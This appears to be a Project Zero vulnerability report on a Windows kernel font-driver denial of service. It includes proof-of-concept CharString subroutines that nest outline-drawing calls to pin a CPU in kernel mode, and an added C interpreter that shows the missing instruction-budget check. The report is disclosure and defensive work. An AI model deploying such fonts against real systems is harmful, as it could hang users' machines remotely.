Windows Kernel ATMFD.DLL DoS via unlimited CharString program execution
Reported by mjurczyk@google.com (Project Member), Nov 14 2014
The Adobe Type Manager Font Driver (ATMFD.DLL), used by the Windows kernel to handle Type 1 (.PFB + .PFM) and OpenType (.OTF) fonts, does not limit the number of CharString interpreter instructions that can be executed per glyph; FreeType, for comparison, caps it at 20,000,000.
By combining nested subroutine calls with computationally expensive operations (such as drawing outlines), it is possible to keep ATMFD.DLL in its main VM execution loop practically forever, consuming 100% of a single CPU (the attack scales to multiple CPUs) and implicitly creating an unkillable process, since the spinning thread never leaves kernel mode.
The issue is reproducible with both Type 1 and OTF fonts on all Microsoft Windows editions (up to 8.1), regardless of bitness. The most obvious attack scenario is local, but since CSS allows arbitrary OTF fonts to be embedded in web pages, the bug can potentially be triggered remotely in browsers that use GDI for font rasterization. Other remote vectors (e.g. PDF or Office documents) might also be viable, but have not been investigated.
The following CharString code executes the outline-drawing subroutine 65536 times (16 calls at each of four nesting levels), which is sufficient to demonstrate the attack on any modern machine:
<CharString index="40">
-100 0 rmoveto 100 100 rlineto 0 -100 rlineto return
</CharString>
<CharString index="41">
-67 callsubr -67 callsubr -67 callsubr -67 callsubr
-67 callsubr -67 callsubr -67 callsubr -67 callsubr
-67 callsubr -67 callsubr -67 callsubr -67 callsubr
-67 callsubr -67 callsubr -67 callsubr -67 callsubr
return
</CharString>
<CharString index="42">
-66 callsubr -66 callsubr -66 callsubr -66 callsubr
-66 callsubr -66 callsubr -66 callsubr -66 callsubr
-66 callsubr -66 callsubr -66 callsubr -66 callsubr
-66 callsubr -66 callsubr -66 callsubr -66 callsubr
return
</CharString>
<CharString index="43">
-65 callsubr -65 callsubr -65 callsubr -65 callsubr
-65 callsubr -65 callsubr -65 callsubr -65 callsubr
-65 callsubr -65 callsubr -65 callsubr -65 callsubr
-65 callsubr -65 callsubr -65 callsubr -65 callsubr
return
</CharString>
<CharString index="44">
-64 callsubr -64 callsubr -64 callsubr -64 callsubr
-64 callsubr -64 callsubr -64 callsubr -64 callsubr
-64 callsubr -64 callsubr -64 callsubr -64 callsubr
-64 callsubr -64 callsubr -64 callsubr -64 callsubr
return
</CharString>
[...]
<CharString name="A">
100 0 rmoveto -63 callsubr endchar
</CharString>
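The fan-out above is easiest to understand by executing it. The following is an added example, not code from the report, from ATMFD.DLL or from FreeType: a small Type 2 CharString interpreter in C covering only the operators the PoC uses (with rmoveto and rlineto simplified to a single coordinate pair each), plus a generator that rebuilds the PoC's subroutine table for any number of 16-way levels. The instruction budget (`limit`), the nesting cap, the `stats` struct and all function names are this example's own assumptions. Rendering glyph A against four levels reproduces the 65536 leaf executions; six levels against a FreeType-sized budget of 20,000,000 instructions is cut off, which is the check the report says ATMFD lacks.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not ATMFD.DLL, FreeType or the report's own code: a minimal
 * Type 2 CharString VM with the PoC's opcode subset, an optional per-glyph
 * instruction budget, and a generator for the PoC's 16-way subr fan-out. */

#define SUBR_BIAS 107   /* Type 2 subr bias for fonts with fewer than 1240 subrs */
#define MAX_STACK 48    /* Type 2 argument stack limit */
#define MAX_DEPTH 10    /* Type 2 subr nesting limit: bounds depth, not work */
#define MAX_SUBRS 64    /* assumption: room for subr 40 plus up to 23 levels */
#define MAX_CODE  40    /* 16 (number, callsubr) pairs plus return */

enum op { OP_NUM, OP_RMOVETO, OP_RLINETO, OP_CALLSUBR, OP_RETURN, OP_ENDCHAR };
enum result { RES_END, RES_RETURN, RES_BUDGET, RES_ERROR };
struct tok  { enum op op; int num; };
struct code { struct tok t[MAX_CODE]; int len; };
struct vm {
    const struct code *subrs; int nsubrs;
    int stack[MAX_STACK], sp, x, y;
    long limit;             /* 0 = unlimited (what the report describes for ATMFD) */
    long executed;          /* operands and operators consumed so far */
    long movetos, linetos;  /* outline work actually performed */
};
struct stats { enum result res; long executed, movetos, linetos; };

static int pop(struct vm *vm, int *out)
{
    if (vm->sp < 1) return 0;
    *out = vm->stack[--vm->sp];
    return 1;
}

static enum result exec(struct vm *vm, const struct code *c, int depth)
{
    for (int pc = 0; pc < c->len; pc++) {
        int dx, dy, idx;
        /* The check the report says ATMFD lacks: count every instruction. */
        vm->executed++;
        if (vm->limit && vm->executed > vm->limit) return RES_BUDGET;
        switch (c->t[pc].op) {
        case OP_NUM:
            if (vm->sp >= MAX_STACK) return RES_ERROR;
            vm->stack[vm->sp++] = c->t[pc].num;
            break;
        case OP_RMOVETO:   /* simplified to one dx dy pair, no width argument */
            if (!pop(vm, &dy) || !pop(vm, &dx)) return RES_ERROR;
            vm->x += dx; vm->y += dy; vm->movetos++;
            break;
        case OP_RLINETO:   /* simplified to one segment per operator */
            if (!pop(vm, &dy) || !pop(vm, &dx)) return RES_ERROR;
            vm->x += dx; vm->y += dy; vm->linetos++;
            break;
        case OP_CALLSUBR: {
            if (!pop(vm, &idx)) return RES_ERROR;
            idx += SUBR_BIAS;
            if (idx < 0 || idx >= vm->nsubrs || depth >= MAX_DEPTH) return RES_ERROR;
            enum result r = exec(vm, &vm->subrs[idx], depth + 1);
            if (r != RES_RETURN) return r;   /* endchar, budget or error unwinds */
            break;
        }
        case OP_RETURN:  return RES_RETURN;
        case OP_ENDCHAR: return RES_END;
        }
    }
    return RES_RETURN;
}

static void emit(struct code *c, enum op op, int num) { c->t[c->len].op = op; c->t[c->len++].num = num; }

/* Rebuild the PoC's table: subr 40 draws a small outline, subr 40+k calls
 * subr 40+k-1 sixteen times, so the glyph runs subr 40 16^levels times. */
static int build_fanout(struct code *subrs, int levels)
{
    memset(subrs, 0, sizeof(struct code) * MAX_SUBRS);
    struct code *leaf = &subrs[40];
    emit(leaf, OP_NUM, -100); emit(leaf, OP_NUM, 0);    emit(leaf, OP_RMOVETO, 0);
    emit(leaf, OP_NUM, 100);  emit(leaf, OP_NUM, 100);  emit(leaf, OP_RLINETO, 0);
    emit(leaf, OP_NUM, 0);    emit(leaf, OP_NUM, -100); emit(leaf, OP_RLINETO, 0);
    emit(leaf, OP_RETURN, 0);
    for (int k = 1; k <= levels; k++) {
        for (int i = 0; i < 16; i++) {
            emit(&subrs[40 + k], OP_NUM, 40 + k - 1 - SUBR_BIAS);  /* -67 for subr 40 */
            emit(&subrs[40 + k], OP_CALLSUBR, 0);
        }
        emit(&subrs[40 + k], OP_RETURN, 0);
    }
    return 40 + levels;   /* the subr glyph A calls: 44 (= -63 callsubr) for 4 levels */
}

/* Run glyph "A" (100 0 rmoveto <top> callsubr endchar) against `levels` of fan-out. */
static struct stats render_glyph(int levels, long limit)
{
    static struct code subrs[MAX_SUBRS];
    struct code glyph; struct vm vm; struct stats s;
    int top = build_fanout(subrs, levels);
    memset(&glyph, 0, sizeof glyph); memset(&vm, 0, sizeof vm);
    emit(&glyph, OP_NUM, 100); emit(&glyph, OP_NUM, 0); emit(&glyph, OP_RMOVETO, 0);
    emit(&glyph, OP_NUM, top - SUBR_BIAS); emit(&glyph, OP_CALLSUBR, 0);
    emit(&glyph, OP_ENDCHAR, 0);
    vm.subrs = subrs; vm.nsubrs = MAX_SUBRS; vm.limit = limit;
    s.res = exec(&vm, &glyph, 0);
    s.executed = vm.executed; s.movetos = vm.movetos; s.linetos = vm.linetos;
    return s;
}

int main(void)
{
    struct stats a = render_glyph(4, 0);           /* the PoC as shown, no budget */
    struct stats b = render_glyph(6, 20000000L);   /* two more levels vs a FreeType-sized budget */
    printf("levels=4 no limit: res=%d executed=%ld movetos=%ld linetos=%ld\n",
           a.res, a.executed, a.movetos, a.linetos);
    printf("levels=6 limit=20M: res=%d (RES_BUDGET=%d) executed=%ld\n", b.res, RES_BUDGET, b.executed);
    return 0;
}
```

Note what the nesting cap does not buy: the Type 2 limit of 10 nested subr calls bounds recursion depth, not work, because each level may hold as many `callsubr` pairs as a charstring can fit and the argument stack never holds more than one operand at a time (exactly the pattern the PoC uses). Ten levels of 16-way fan-out would execute the leaf about 1.1 x 10^12 times, so an interpreter that rasterizes attacker-supplied fonts needs an explicit per-glyph instruction budget (or a time bound) in addition to depth and stack checks; with `levels` above 9 this example's `MAX_DEPTH` check simply returns `RES_ERROR` on the first leaf call.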
Attached are the following PoC files:
1) The source code of an OTF file (poc.ttx) and the resulting font (poc.otf), compiled with the "ttx" utility from the open-source "fonttools" project (https://github.com/behdad/fonttools/).
2) The source code of a Type 1 font (poc.pfa) and the resulting font (poc.pfb, poc.pfm), compiled with the "type1" utility from the "Adobe Font Development Kit for OpenType" software package (http://www.adobe.com/devnet/opentype/afdko/topic_overview.html).
Comment 1 by mjurczyk@google.com, Nov 14 2014
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.